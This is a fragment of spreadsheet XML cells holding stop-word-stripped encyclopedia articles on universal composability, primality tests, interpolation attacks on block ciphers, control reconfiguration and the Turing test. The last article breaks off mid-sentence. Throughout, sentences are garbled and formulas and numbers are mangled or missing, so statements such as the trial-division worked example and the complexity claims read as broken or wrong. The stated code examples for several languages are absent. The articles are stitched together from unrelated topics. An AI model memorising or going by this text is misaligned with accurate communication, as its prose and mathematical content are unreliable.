reveal information message adversary, e.g. length message. asynchronous communication modeled delay mechanism {\displaystyle {\mathcal {f}}_{\mathsf {auth}}} more advanced channels while technical means, physical assumptions behind anonymous pseudonymous communication different, modeling channels using ideal functionalities analogous. also onion routing anonymous p2p. similar functionalities defined broadcast communication, synchronous communication. ideal anonymous channel ideal anonymous channel, ideal functionality, {\displaystyle {\mathcal {f}}_{\mathsf {anon}}} takes message {\displaystyle party identity {\displaystyle input, outputs message without disclosing identity {\displaystyle recipient adversary. ideal pseudonymous channel ideal pseudonymous channel, participating parties first register unique pseudonyms ideal functionality {\displaystyle {\mathcal {f}}_{\mathsf {pseu}}} transfer {\displaystyle {\mathcal {f}}_{\mathsf {pseu}}} takes message {\displaystyle pseudonym {\displaystyle nym} recipient input. ideal functionality looks owner pseudonym transfers message {\displaystyle m,nym} without revealing identity sender. these formalisations abstract implementation details concrete systems implement channels. pure form ideal functionality found unrealizable. necessary relax functionality leaking information adversary (degree anonymity). hand communication channels physical, e.g. mobile device achieve anonymous channel constantly changing location transmitting messages contain identifiers. impossibility results there exists commitment protocol universally composable standard model. intuition ideal model, simulator extract value commit input environment. this would allow receiver real protocol extract committed value break security protocol. this impossibility result applied functionalities. setup trust assumptions circumvent impossibility result, additional assumptions required. additional setup trust assumptions, common reference string model assumption trusted certification authority also modeled using ideal functionalities controversy models reactive simulatability similar model developed concurrently universal compsability model. abstract/constructive cryptography recent general-purpose model composeable analysis cryptographic protocols. gnuc iitm model reformulations universal composability researcher (prominently, victor shoup ralf kuesters) influenced versions canonical model canetti. also abstraction burrows-abadi-needham logic mathematical model secure multi-party computation references</t>
  </si>
  <si>
    <t>Primality test</t>
  </si>
  <si>
    <t>primality test algorithm determining whether input number prime. among fields mathematics, used cryptography. unlike integer factorization, primality tests generally give prime factors, stating whether input number prime not. factorization thought computationally difficult problem, whereas primality testing comparatively easy (its running time polynomial size input). some primality tests prove number prime, others like miller–rabin prove number composite. therefore, latter might accurately called compositeness tests instead primality tests. simple methods simplest primality test trial division: given input number, check whether evenly divisible prime number (i.e. division leaves remainder). composite. otherwise, prime.for example, consider number 100, evenly divisible numbers: 50note largest factor, half 100. this holds true divisors less equal n/2. actually, test possible divisors n/2, discover factors twice. observe this, rewrite list divisors list products, equal 100: 2notice products past merely repeat numbers appeared earlier products. example, consist numbers. this holds true unique divisors numbers less equal need search past that. example, √100 10.) even numbers greater also eliminated: even number divide let's trial division test primality need test divisors i.e. integers less equal 4.12 {\displaystyle \scriptstyle {\sqrt {17}}\approx 4.12} namely skip even number: could evenly divide would too, already list. that leaves divide numbers, find neither divides evenly—both divisions leave remainder. prime. improve method further. observe primes greater form integer greater this integers expressed note divides divides efficient method test whether divisible check numbers form {\displaystyle \scriptstyle 1\leq {\sqrt {n}}} this times faster testing numbers generalising further, primes greater primorial) form integers represents numbers coprime example, then integers form 2,...,29 integer. however, divides 4,..., divides ..., divides ..., prime numbers greater form (i.e. gcd(i,30) note coprime, would divisible prime divisor namely would therefore prime. order match previous method allowing negative instead checking c#-1 (because always even), check c#/2, list values integers form example, note list always include primes greater smaller c#/2. numbers meet aforementioned conditions prime. example, form c#=210, k=2, i=17. however, composite number equal 19*23. that numbers given form still need tested primality. number values take certain range decreases, time test decreases. method, also necessary check divisibility primes less observations analogous preceding applied recursively, giving sieve eratosthenes. good speed methods (and others mentioned below) pre-compute store list primes certain bound, primes 200. (such list computed sieve eratosthenes algorithm tests incremental known primes √m). then, testing primality serious method, first checked divisibility prime list. divisible numbers composite, tests skipped. simple inefficient primality test uses wilson's theorem, states prime {\displaystyle (p-1)!\equiv -1{\pmod {p}}\,} although method requires modular multiplications, rendering impractical, theorems primes modular residues form basis many practical methods. example code python following simple primality test python using simple optimization mentioned earlier. more sophisticated methods described much faster large c++, following primality test family languages using optimization above. following primality test using optimization above. javascript following primality test javascript using optimization above. following primality test (programming language) using optimization above. dart following primality test dart (programming_language) using optimization above. freepascal following primality test freepascal using optimization above. heuristic tests these tests seem work well practice, unproven therefore not, technically speaking, algorithms all. fermat test fibonacci test simple examples, effective combined. john selfridge conjectured number, (mod prime following hold: 2p−1 (mod fp+1 (mod p),where k-th fibonacci number. first condition fermat primality test using base general, (mod x2+4), quadratic non-residue (mod x2+4) prime following conditions hold: 2p−1 (mod f(1)p+1 (mod p),f(x)k k-th fibonacci polynomial selfridge, carl pomerance, samuel wagstaff together offer $620 counterexample. problem still open september 2015. probabilistic tests probabilistic tests rigorous heuristics provide provable bounds probability fooled composite number. many popular primality tests probabilistic tests. these tests use, apart tested number numbers chosen random sample space; usual randomized primality tests never report prime number composite, possible composite number reported prime. probability error reduced repeating test several independently chosen values commonly used tests, composite least half detect compositeness, repetitions reduce error probability 2−k, made arbitrarily small increasing basic structure randomized primality tests follows: randomly pick number check equality (corresponding chosen test) involving given number equality fails hold true, composite number witness compositeness, test stops. back step required accuracy reached.after iterations, found composite number, declared probably prime. fermat primality test simplest probabilistic primality test fermat primality test (actually compositeness test). works follows: given integer choose integer coprime calculate modulo result different composite. prime.if an−1 (modulo prime, called pseudoprime base practice, observe that, an−1 (modulo usually prime. counterexample: {\displaystyle 2^{340}\equiv 1{\pmod {341}}} even though 11·31 composite. fact, smallest pseudoprime base (see figure there 21853 pseudoprimes base less 2.5×1010 (see page 1005 this means that, 2.5×1010, 2n−1 (modulo equals prime, unless 21853 pseudoprimes. some composite numbers (carmichael numbers) property (modulo every coprime smallest example 3·11·17, a560 (modulo 561) coprime 561. nevertheless, fermat test often used rapid screening numbers needed, instance generation phase public cryptographic algorithm. miller–rabin solovay–strassen primality test miller–rabin primality test solovay–strassen primality test sophisticated variants, detect composites (once again, means: every composite number least (miller–rabin) (solovay–strassen) numbers witnesses compositeness these also compositeness tests. miller–rabin primality test works follows: given integer choose positive integer odd. {\displaystyle a^{d}\not \equiv 1{\pmod {n}}} {\displaystyle a^{2^{r}d}\not \equiv -1{\pmod {n}}} {\displaystyle 0\leq r\leq s-1,} composite witness compositeness. otherwise, prime. miller–rabin test strong pseudoprime test (see page 1004). solovay–strassen primality test uses another equality: given number choose integer {\displaystyle a^{(n-1)/2}\not \equiv \left({\frac {a}{n}}\right){\pmod {n}}} {\displaystyle \left({\frac {a}{n}}\right)} jacobi symbol,then composite witness compositeness. otherwise, prime. solovay–strassen test euler pseudoprime test (see page 1003). individual value solovay–strassen test weaker miller–rabin test. example, 1905 miller-rabin test shows composite, solovay–strassen test not. this 1905 euler pseudoprime base strong pseudoprime base (this illustrated figure psw). frobenius primality test miller–rabin solovay–strassen primality tests simple much faster general primality tests. method improving efficiency cases frobenius pseudoprimality test; round test takes three times long round miller–rabin, achieves probability bound comparable seven rounds miller–rabin. frobenius test generalization lucas pseudoprime test. baillie–psw primality test baillie–psw primality test probabilistic primality test combines fermat miller–rabin test lucas probable prime test primality test known counterexamples. that known composite test reports probably prime. shown counterexamples {\displaystyle &lt;2^{64}} other tests leonard adleman ming-deh huang presented errorless (but expected polynomial-time) variant elliptic curve primality test. unlike probabilistic tests, algorithm produces primality certificate, thus used prove number prime. algorithm prohibitively slow practice. quantum computers available, primality could tested asymptotically faster using classical computers. combination shor's algorithm, integer factorization method, pocklington primality test could solve problem {\displaystyle o((\log n)^{3}(\log \log n)^{2}\log \log \log fast deterministic tests near beginning 20th century, shown corollary fermat's little theorem could used test primality. this resulted pocklington primality test. however, test requires partial factorization running time still quite slow worst case. first deterministic primality test significantly faster naive methods cyclotomy test; runtime proven o((log number test primality constant independent many improvements made, none could proven polynomial running time. (note running time measured terms size input, case number bits needed represent number elliptic curve primality test proven o((log n)6), conjectures analytic number theory true. similarly, generalized riemann hypothesis, deterministic miller's test, forms basis probabilistic miller–rabin test, proved õ((log n)4). practice, algorithm slower sizes numbers dealt all. because implementation methods rather difficult creates risk programming errors, slower simpler tests often preferred. 2002, first provably unconditional deterministic polynomial time test primality invented manindra agrawal, neeraj kayal, nitin saxena. primality test runs õ((log n)12) (improved õ((log n)7.5) published revision paper), reduced õ((log n)6) sophie germain conjecture true. subsequently, lenstra pomerance presented version test runs time õ((log n)6) unconditionally.agrawal, kayal saxena suggest variant algorithm would õ((log n)3) agrawal's conjecture true; however, heuristic argument hendrik lenstra carl pomerance suggests probably false. modified version agrawal's conjecture, agrawal–popovych conjecture, still true. complexity computational complexity theory, formal language corresponding prime numbers denoted primes. easy show primes co-np: complement composites decide compositeness nondeterministically guessing factor. 1975, vaughan pratt showed existed certificate primality checkable polynomial time, thus primes therefore conp. primality certificate details. subsequent discovery solovay–strassen miller–rabin algorithms primes corp. 1992, adleman–huang algorithm reduced complexity corp, superseded pratt's result. adleman–pomerance–rumely primality test 1983 primes (quasi-polynomial time), known comparable classes mentioned above. because tractability practice, polynomial-time algorithms assuming riemann hypothesis, similar evidence, long suspected proven primality could solved polynomial time. existence primality test finally settled long-standing question placed primes however, primes known p-complete, known whether lies classes lying inside known primes ac0. number-theoretic methods certain number-theoretic methods exist testing whether number prime, lucas test proth's test. these tests typically require factorization similar quantity, means useful general-purpose primality testing, often quite powerful tested number known special form. lucas test relies fact multiplicative order number modulo prime primitive root modulo show primitive show prime. references sources external links solovay-strassen (computacion.cs.cinvestav.mx) archive.today (archived 2012-12-20) implementation solovay-strassen primality test maple distinguishing prime numbers composite numbers, d.j. bernstein (cr.yp.to) prime pages (primes.utm.edu) lucas primality test factored (mathpages.com) library congress archives (archived 2010-08-06) primaboinca research project uses internet-connected computers search counterexample conjectures. first conjecture (agrawal's conjecture) basis formulation first deterministic prime test algorithm polynomial time (aks algorithm).</t>
  </si>
  <si>
    <t>Interpolation attack</t>
  </si>
  <si>
    <t>cryptography, interpolation attack type cryptanalytic attack block ciphers. after attacks, differential cryptanalysis linear cryptanalysis, presented block ciphers, block ciphers introduced, proven secure differential linear attacks. among iterated block ciphers kn-cipher shark cipher. however, thomas jakobsen lars knudsen showed late 1990s ciphers easy break introducing attack called interpolation attack. attack, algebraic function used represent s-box. this simple quadratic, polynomial rational function galois field. coefficients determined standard lagrange interpolation techniques, using known plaintexts data points. alternatively, chosen plaintexts used simplify equations optimize attack. simplest version interpolation attack expresses ciphertext polynomial plaintext. polynomial relative number unknown coefficients, collection plaintext/ciphertext (p/c) pairs, polynomial reconstructed. with polynomial reconstructed attacker representation encryption, without exact knowledge secret key. interpolation attack also used recover secret key. easiest describe method example. example iterated cipher given {\displaystyle c_{i}=(c_{i-1}\oplus k_{i})^{3},} {\displaystyle c_{0}} plaintext, {\displaystyle c_{i}} output {\displaystyle i^{th}} round, {\displaystyle k_{i}} secret {\displaystyle i^{th}} round (derived secret {\displaystyle schedule), {\displaystyle -round iterated cipher, {\displaystyle c_{r}} ciphertext. consider 2-round cipher. {\displaystyle denote message, {\displaystyle denote ciphertext. then output round becomes {\displaystyle c_{1}=(x+k_{1})^{3}=(x^{2}+k_{1}^{2})(x+k_{1})=x^{3}+k_{1}^{2}x+x^{2}k_{1}+k_{1}^{3},} output round becomes {\displaystyle c_{2}=c=(c_{1}+k_{2})^{3}=(x^{3}+k_{1}^{2}x+x^{2}k_{1}+k_{1}^{3}+k_{2})^{3}} {\displaystyle =x^{9}+x^{8}k_{1}+x^{6}k_{2}+x^{4}k_{1}^{2}k_{2}+x^{3}k_{2}^{2}+x^{2}(k_{1}k_{2}^{2}+k_{1}^{4}k_{2})+x(k_{1}^{2}k_{2}^{2}+k_{1}^{8})+k_{1}^{3}k_{2}^{2}+k_{1}^{9}+k_{2}^{3},} expressing ciphertext polynomial plaintext yields {\displaystyle p(x)=a_{1}x^{9}+a_{2}x^{8}+a_{3}x^{6}+a_{4}x^{4}+a_{5}x^{3}+a_{6}x^{2}+a_{7}x+a_{8},} {\displaystyle a_{i}} dependent constants. using many plaintext/ciphertext pairs number unknown coefficients polynomial {\displaystyle p(x)} construct polynomial. this example done lagrange interpolation (see lagrange polynomial). when unknown coefficients determined, representation {\displaystyle p(x)} encryption, without knowledge secret {\displaystyle existence considering {\displaystyle -bit block cipher, {\displaystyle 2^{m}} possible plaintexts, therefore {\displaystyle 2^{m}} distinct {\displaystyle p/c} pairs. {\displaystyle unknown coefficients {\displaystyle p(x)} since require many {\displaystyle p/c} pairs number unknown coefficients polynomial, interpolation attack exist {\displaystyle n\leq 2^{m}} time complexity assume time construct polynomial {\displaystyle p(x)} using {\displaystyle p/c} pairs small, comparison time encrypt required plaintexts. {\displaystyle unknown coefficients {\displaystyle p(x)} then time complexity attack {\displaystyle requiring {\displaystyle known distinct {\displaystyle p/c} pairs. interpolation attack meet-in-the-middle often method efficient. here done. given {\displaystyle round iterated cipher block length {\displaystyle {\displaystyle output cipher {\displaystyle rounds {\displaystyle s&lt;r} express value {\displaystyle polynomial plaintext {\displaystyle polynomial ciphertext {\displaystyle {\displaystyle g(x)\in gf(2^{m})[x]} expression {\displaystyle {\displaystyle {\displaystyle h(c)\in gf(2^{m})[c]} expression {\displaystyle {\displaystyle polynomial {\displaystyle g(x)} obtain computing forward using iterated formula cipher round {\displaystyle polynomial {\displaystyle h(c)} obtain computing backwards iterated formula cipher starting round {\displaystyle round {\displaystyle s+1} hold {\displaystyle g(x)=h(c),} {\displaystyle {\displaystyle polynomials number coefficients, solve equation unknown coefficients. time complexity assume {\displaystyle g(x)} expressed {\displaystyle coefficients, {\displaystyle h(c)} expressed {\displaystyle coefficients. then would need {\displaystyle p+q} known distinct {\displaystyle p/c} pairs solve equation setting matrix equation. however, matrix equation solvable multiplication addition. make sure unique non-zero solution, coefficient corresponding highest degree one, constant term zero. therefore, {\displaystyle p+q-2} known distinct {\displaystyle p/c} pairs required. time complexity attack {\displaystyle p+q-2} requiring {\displaystyle p+q-2} known distinct {\displaystyle p/c} pairs. meet-in-the-middle approach total number coefficients usually smaller using normal method. this makes method efficient, since less {\displaystyle p/c} pairs required. key-recovery also interpolation attack recover secret {\displaystyle remove last round {\displaystyle -round iterated cipher block length {\displaystyle output cipher becomes {\displaystyle {\tilde {y}}=c_{r-1}} call cipher reduced cipher. idea make guess last round {\displaystyle k_{r}} decrypt round obtain output {\displaystyle {\tilde {y}}} reduced cipher. then verify guess interpolation attack reduced cipher either normal method meet-in-the-middle method. here done. normal method express output {\displaystyle {\tilde {y}}} reduced cipher polynomial plaintext {\displaystyle call polynomial {\displaystyle p(x)\in gf(2^{m})[x]} then express {\displaystyle p(x)} {\displaystyle coefficients, using {\displaystyle known distinct {\displaystyle p/c} pairs, construct polynomial. verify guess last round key, check extra {\displaystyle p/c} pair holds {\displaystyle p(x)={\tilde {y}}.} yes, high probability guess last round correct. make another guess key. meet-in-the-middle method express output {\displaystyle round {\displaystyle s&lt;r} polynomial plaintext {\displaystyle polynomial output reduced cipher {\displaystyle {\tilde {y}}} call polynomials {\displaystyle g(x)} {\displaystyle h({\tilde {y}})} expressed {\displaystyle {\displaystyle coefficients, respectively. then {\displaystyle q+p-2} known distinct {\displaystyle p/c} pairs find coefficients. verify guess last round key, check extra {\displaystyle p/c} pair holds {\displaystyle g(x)=h({\tilde {y}}).} yes, high probability guess last round correct. make another guess key. once found correct last round key, continue similar fashion remaining round keys. time complexity with secret round length {\displaystyle {\displaystyle 2^{m}} different keys. each probability {\displaystyle 1/2^{m}} correct chosen random. therefore, average make {\displaystyle 1/2\cdot 2^{m}} guesses finding correct key. hence, normal method average time complexity {\displaystyle 2^{m-1}(n+1)} requiring {\displaystyle n+1} known distinct {\displaystyle c/p} pairs, meet-in-the-middle method average time complexity {\displaystyle 2^{m-1}(p+q-1)} requiring {\displaystyle p+q-1} known distinct {\displaystyle c/p} pairs. real world application meet-in-the-middle attack used variant attack s-boxes, uses inverse function, {\displaystyle -bit s-box {\displaystyle s:f(x)=x^{-1}=x^{2^{m}-2}} {\displaystyle gf(2^{m})} block cipher shark uses sp-network s-box {\displaystyle s:f(x)=x^{-1}} cipher resistant differential linear cryptanalysis small number rounds. however broken 1996 thomas jakobsen lars knudsen, using interpolation attack. denote shark {\displaystyle (n,m,r)} version shark block size {\displaystyle bits using {\displaystyle parallel {\displaystyle -bit s-boxes {\displaystyle rounds. jakobsen knudsen found exist interpolation attack shark {\displaystyle (8,8,4)} (64-bit block cipher) using {\displaystyle 2^{21}} chosen plaintexts, interpolation attack shark {\displaystyle (8,16,7)} (128-bit block cipher) using {\displaystyle 2^{61}} chosen plaintexts. also thomas jakobsen introduced probabilistic version interpolation attack using madhu sudan's algorithm improved decoding reed-solomon codes. this attack work even algebraic relationship plaintexts ciphertexts holds fraction values. references thomas jakobsen, lars knudsen (january 1997). interpolation attack block ciphers (pdf/postscript). international workshop fast software encryption (fse '97), lncs 1267. haifa: springer-verlag. 28–40. retrieved 2007-07-03. thomas jakobsen (august 1998). cryptanalysis block ciphers probabilistic non-linear relations degree (pdf/postscript). advances cryptology crypto '98. santa barbara, california: springer-verlag. 212–222. retrieved 2007-07-06. (video presentation google video—uses flash) shiho moriai; takeshi shimoyama; toshinobu kaneko (march 1999). interpolation attacks block cipher: snake (pdf). '99. rome: springer-verlag. 275–289. retrieved 2007-09-16. youssef; guang gong (april 2000). interpolation attacks block ciphers (pdf). 2000. york city: springer-verlag. 109–120. retrieved 2007-07-06. kaoru kurosawa; tetsu iwata; viet duong quang (august 2000). root finding interpolation attack (pdf/postscript). proceedings annual international workshop selected areas cryptography (sac 2000). waterloo, ontario: springer-verlag. 303–314. retrieved 2007-07-06.</t>
  </si>
  <si>
    <t>Control reconfiguration</t>
  </si>
  <si>
    <t>control reconfiguration active approach control theory achieve fault-tolerant control dynamic systems. used severe faults, actuator sensor outages, cause break-up control loop, must restructured prevent failure system level. addition loop restructuring, controller parameters must adjusted accommodate changed plant dynamics. control reconfiguration building block toward increasing dependability systems feedback control. reconfiguration problem fault modelling figure right shows plant controlled controller standard control loop. nominal linear model plant {\displaystyle {\begin{cases}{\dot {\mathbf }}&amp;=\mathbf \mathbf +\mathbf \mathbf \\\mathbf &amp;=\mathbf \mathbf \end{cases}}} plant subject fault (indicated arrow figure) modelled general {\displaystyle {\begin{cases}{\dot {\mathbf }}_{f}&amp;=\mathbf _{f}\mathbf _{f}+\mathbf _{f}\mathbf \\\mathbf _{f}&amp;=\mathbf _{f}\mathbf _{f}\end{cases}}} subscript {\displaystyle indicates system faulty. this approach models multiplicative faults modified system matrices. specifically, actuator faults represented input matrix {\displaystyle \mathbf _{f}} sensor faults represented output {\displaystyle \mathbf _{f}} internal plant faults represented system matrix {\displaystyle \mathbf _{f}} upper part figure shows supervisory loop consisting fault detection isolation (fdi) reconfiguration changes loop choosing input output signals {\displaystyle \mathbf ,\mathbf reach control goal, changing controller internals (including dynamic structure parameters), adjusting reference input {\displaystyle \mathbf end, vectors inputs outputs contain available signals, used controller fault-free operation. alternative scenarios model faults additive external signal {\displaystyle \mathbf influencing state derivatives outputs follows: {\displaystyle {\begin{cases}{\dot {\mathbf }}_{f}&amp;=\mathbf \mathbf _{f}+\mathbf \mathbf +\mathbf \mathbf \\\mathbf _{f}&amp;=\mathbf _{f}\mathbf _{f}+\mathbf \mathbf \end{cases}}} reconfiguration goals goal reconfiguration keep reconfigured control-loop performance sufficient preventing plant shutdown. following goals distinguished: stabilization equilibrium recovery output trajectory recovery state trajectory recovery transient time response recoveryinternal stability reconfigured closed loop usually minimum requirement. equilibrium recovery goal (also referred weak goal) refers steady-state output equilibrium reconfigured loop reaches given constant input. this equilibrium must equal nominal equilibrium input time tends infinity). this goal ensures steady-state reference tracking reconfiguration. output trajectory recovery goal (also referred strong goal) even stricter. requires dynamic response input must equal nominal response times. further restrictions imposed state trajectory recovery goal, requires state trajectory restored nominal case reconfiguration input. usually combination goals pursued practice, equilibrium-recovery goal stability. question whether similar goals reached specific faults addressed reconfigurability analysis. reconfiguration approaches fault hiding this paradigm aims keeping nominal controller loop. end, reconfiguration block placed faulty plant nominal controller. together faulty plant, forms reconfigured plant. reconfiguration block fulfill requirement behaviour reconfigured plant matches behaviour nominal, fault-free plant. linear model following linear model following, formal feature nominal closed loop attempted recovered. classical pseudo-inverse method, closed loop system matrix {\displaystyle {\bar {\mathbf }}=\mathbf -\mathbf \mathbf state-feedback control structure used. controller {\displaystyle \mathbf _{f}} found approximate {\displaystyle {\bar {\mathbf sense induced matrix norm.in perfect model following, dynamic compensator introduced allow exact recovery complete loop behaviour certain conditions. eigenstructure assignment, nominal closed loop eigenvalues eigenvectors (the eigenstructure) recovered nominal case fault. optimisation-based control schemes optimisation control schemes include: linear-quadratic regulator design (lqr), model predictive control (mpc) eigenstructure assignment methods. probabilistic approaches some probabilistic approaches developed. learning control there learning automata, neural networks, etc. mathematical tools frameworks methods reconfiguration achieved differ considerably. following list gives overview mathematical approaches commonly used. adaptive control (ac) disturbance decoupling (dd) eigenstructure assignment (ea) gain scheduling (gs)/linear parameter varying (lpv) generalised internal model control (gimc) intelligent control (ic) linear matrix inequality (lmi) linear-quadratic regulator (lqr) model following (mf) model predictive control (mpc) pseudo-inverse method (pim) robust control techniques also prior control reconfiguration, must least determined whether fault occurred (fault detection) components affected (fault isolation). preferably, model faulty plant provided (fault identification). these questions addressed fault diagnosis methods. fault accommodation another common approach achieve fault tolerance. contrast control reconfiguration, accommodation limited internal controller changes. sets signals manipulated measured controller fixed, means loop cannot restructured. references further reading blanke, kinnaert, lunze, staroswiecki, (2006), diagnosis fault-tolerant control (2nd ed.), springer steffen, (2005), control reconfiguration dynamical systems, springer staroswiecki, (2005), "fault tolerant control: pseudo-inverse method revisited", proceedings 16th ifac world congress, prague, czech republic: ifac lunze, rowe-serrano, steffen, (2003), "control reconfiguration demonstrated two-degrees-of-freedom helicopter model", proceedings european control conference (ecc), cambridge, maciejowski, jones, (2003), "mpc fault-tolerant flight control case study: flight 1862", proceedings safeprocess 2003: symposium detection safety technical processes, washington d.c., usa: ifac, 265–276 mahmoud, jiang, zhang, (2003), active fault tolerant control systems stochastic analysis synthesis, springer zhang, jiang, (2003), "bibliographical review reconfigurable fault-tolerant control systems", proceedings safeprocess 2003: symposium detection safety technical processes, washington d.c., usa: ifac, 265–276 patton, (1997), "fault-tolerant control: 1997 situation", preprints ifac symposium fault detection supervision safety technical processes, kingston upon hull, 1033–1055 rauch, (1995), "autonomous control reconfiguration", ieee control systems magazine, (6): 37–48, doi:10.1109/37.476385 rauch, (1994), "intelligent fault diagnosis control reconfiguration", ieee control systems magazine, (3): 6–12, doi:10.1109/37.291462, s2cid 39931526 gao, antsaklis, p.j. (1991), "stability pseudo-inverse method reconfigurable control systems", international journal control, (3): 717–729, doi:10.1080/00207179108953643 looze, weiss, j.l.; eterno, j.s.; barrett, n.m. (1985), automatic redesign approach restructurable control systems", ieee control systems magazine, (2): 16–22, doi:10.1109/mcs.1985.1104940, s2cid 12684489. esna ashari, khaki sedigh, yazdanpanah, (2005), "reconfigurable control system design using eigenstructure assignment: static, dynamic robust approaches", international journal control, (13): 1005–1016, doi:10.1080/00207170500241817, s2cid 121350006.</t>
  </si>
  <si>
    <t>Turing test</t>
  </si>
  <si>
    <t>turing test, originally called imitation game alan turing 1950, test machine's ability exhibit intelligent behaviour equivalent indistinguishable from, human. turing proposed human evaluator would judge natural language conversations human machine designed generate human-like responses. evaluator would aware partners conversation machine, participants would separated another. conversation would limited text-only channel, computer keyboard screen, result would depend machine's ability render words speech. evaluator could reliably tell machine human, machine would said passed test. test results would depend machine's ability give correct answers questions, closely answers resembled human would give. test introduced turing 1950 paper "computing machinery intelligence" working university manchester. opens words: propose consider question, 'can machines think?'" because "thinking" difficult define, turing chooses "replace question another, closely related expressed relatively unambiguous words." turing describes form problem terms three-person game called "imitation game", interrogator asks questions woman another room order determine correct players. turing's question "are imaginable digital computers would well imitation game?" this question, turing believed, could actually answered. remainder paper, argued major objections proposition "machines think".since turing introduced test, highly influential widely criticised, become important concept philosophy artificial intelligence. some criticisms, john searle's chinese room, controversial. history philosophical background question whether possible machines think long history, firmly entrenched distinction dualist materialist views mind. rené descartes prefigures aspects turing test 1637 discourse method writes: [h]ow many different automata moving machines made industry easily understand machine's constituted utter words, even emit responses action corporeal kind, brings change organs; instance, touched particular part wish another part exclaim hurt, never happens arranges speech various ways, order reply appropriately everything said presence, even lowest type here descartes notes automata capable responding human interactions argues automata cannot respond appropriately things said presence human can. descartes therefore prefigures turing test defining insufficiency appropriate linguistic response separates human automaton. descartes fails consider possibility future automata might able overcome insufficiency, propose turing test such, even prefigures conceptual framework criterion. denis diderot formulates 1746 book pensées philosophiques turing-test criterion, though important implicit limiting assumption maintained, participants natural living beings, rather considering created artifacts: find parrot could answer everything, would claim intelligent without hesitation."this mean agrees this, already common argument materialists time. according dualism, mind non-physical (or, least, non-physical properties) and, therefore, cannot explained purely physical terms. according materialism, mind explained physically, leaves open possibility minds produced artificially.in 1936, philosopher alfred ayer considered standard philosophical question minds: know people conscious experiences book, language, truth logic, ayer suggested protocol distinguish conscious unconscious machine: "the ground asserting object appears conscious really conscious being, dummy machine, fails satisfy empirical tests presence absence consciousness determined." (this suggestion similar turing test, concerned consciousness rather intelligence. moreover, certain ayer's popular philosophical classic familiar turing.) words, thing conscious fails consciousness test. alan turing researchers united kingdom exploring "machine intelligence" years prior founding field artificial intelligence (ai) research 1956. common topic among members ratio club, informal group british cybernetics electronics researchers included alan turing.turing, particular, running notion machine intelligence since least 1941 earliest-known mentions "computer intelligence" made 1947. turing's report, "intelligent machinery", investigated "the question whether possible machinery show intelligent behaviour" and, part investigation, proposed considered forerunner later tests: difficult devise paper machine play game chess. three subjects experiment. rather poor chess players, operator works paper machine. rooms used arrangement communicating moves, game played either paper machine. find quite difficult tell playing. "computing machinery intelligence" (1950) first published paper turing focus exclusively machine intelligence. turing begins 1950 paper claim, propose consider question 'can machines think?'" highlights, traditional approach question start definitions, defining terms "machine" "intelligence". turing chooses instead replaces question one, "which closely related expressed relatively unambiguous words." essence proposes change question "can machines think?" "can machines thinking entities) do?" advantage question, turing argues, draws fairly sharp line physical intellectual capacities man."to demonstrate approach turing proposes test inspired party game, known "imitation game", woman separate rooms guests tell apart writing series questions reading typewritten answers sent back. game, woman convince guests other. (huma shah argues two-human version game presented turing introduce reader machine-human question-answer test.) turing described version game follows: question, "what happen machine takes part game?" will interrogator decide wrongly often game played like game played woman? these questions replace original, "can machines think?" later paper, turing suggests "equivalent" alternative formulation involving judge conversing computer man. while neither formulations precisely matches version turing test generally known today, proposed third 1952. version, turing discussed radio broadcast, jury asks questions computer role computer make significant proportion jury believe really man.turing's paper considered nine putative objections, include major arguments artificial intelligence raised years since paper published (see "computing machinery intelligence"). eliza parry 1966, joseph weizenbaum created program appeared pass turing test. program, known eliza, worked examining user's typed comments keywords. keyword found, rule transforms user's comments applied, resulting sentence returned. keyword found, eliza responds either generic riposte repeating earlier comments. addition, weizenbaum developed eliza replicate behaviour rogerian psychotherapist, allowing eliza "free assume pose knowing almost nothing real world." with techniques, weizenbaum's program able fool people believing talking real person, subjects "very hard convince eliza [...] human." thus, eliza claimed programs (perhaps first) able pass turing test, even though view highly contentious (see naïveté interrogators below). kenneth colby created parry 1972, program described "eliza attitude". attempted model behaviour paranoid schizophrenic, using similar advanced) approach employed weizenbaum. validate work, parry tested early 1970s using variation turing test. group experienced psychiatrists analysed combination real patients computers running parry teleprinters. another group psychiatrists shown transcripts conversations. groups asked identify "patients" human computer programs. psychiatrists able make correct identification percent time figure consistent random guessing.in 21st century, versions programs (now known "chatbots") continue fool people. "cyberlover", malware program, preys internet users convincing "reveal information identities lead visit site deliver malicious content computers". program emerged "valentine-risk" flirting people "seeking relationships online order collect personal data". chinese room john searle's 1980 paper minds, brains, programs proposed "chinese room" thought experiment argued turing test could used determine machine could think. searle noted software (such eliza) could pass turing test simply manipulating symbols understanding. without understanding, could described "thinking" sense people did. therefore, searle concluded, turing test could prove machines could think. much like turing test itself, searle's argument widely criticised endorsed.arguments searle's others working philosophy mind sparked intense debate nature intelligence, possibility intelligent machines value turing test continued 1980s 1990s. loebner prize loebner prize provides annual platform practical turing tests first competition held november 1991. underwritten hugh loebner. cambridge center behavioral studies massachusetts, united states, organised prizes including 2003 contest. loebner described reason competition created advance state research, least part, taken steps implement turing test despite years discussing it.the first loebner prize competition 1991 renewed discussion viability turing test value pursuing popular press academia. first contest mindless program identifiable intelligence managed fool naïve interrogators making wrong identification. this highlighted several shortcomings turing test (discussed below): winner won, least part, able "imitate human typing errors"; unsophisticated interrogators easily fooled; researchers feel test merely distraction fruitful research.the silver (text only) gold (audio visual) prizes never won. however, competition awarded bronze medal every year computer system that, judges' opinions, demonstrates "most human" conversational behaviour among year's entries. artificial linguistic internet computer entity (a.l.i.c.e.) bronze award three occasions recent times (2000, 2001, 2004). learning jabberwacky 2005 2006. loebner prize tests conversational intelligence; winners typically chatterbot programs, artificial conversational entities (ace)s. early loebner prize rules restricted conversations: each entry hidden-human conversed single topic, thus interrogators restricted line questioning entity interaction. restricted conversation rule lifted 1995 loebner prize. interaction duration judge entity varied loebner prizes. loebner 2003, university surrey, interrogator allowed five minutes interact entity, machine hidden-human. between 2004 2007, interaction time allowed loebner prizes twenty minutes. versions saul traiger argues least three primary versions turing test, offered "computing machinery intelligence" describes "standard interpretation". while debate regarding whether "standard interpretation" described turing instead, based misreading paper, three versions regarded equivalent, strengths weaknesses distinct.huma shah points turing concerned whether machine could think providing simple method examine this: human-machine question-answer sessions. shah argues imitation game turing described could practicalised different ways: one-to-one interrogator-machine test, simultaneous comparison machine human, questioned parallel interrogator. since turing test test indistinguishability performance capacity, verbal version generalises naturally human performance capacity, verbal well nonverbal (robotic). imitation game turing's original article describes simple party game involving three players. player man, player woman player (who plays role interrogator) either sex. imitation game, player unable either player player communicate written notes. asking questions player player player tries determine woman. player role trick interrogator making wrong decision, player attempts assist interrogator making right one.turing asks: "what happen machine takes part game? will interrogator decide wrongly often game played like game played woman?" these questions replace original, "can machines 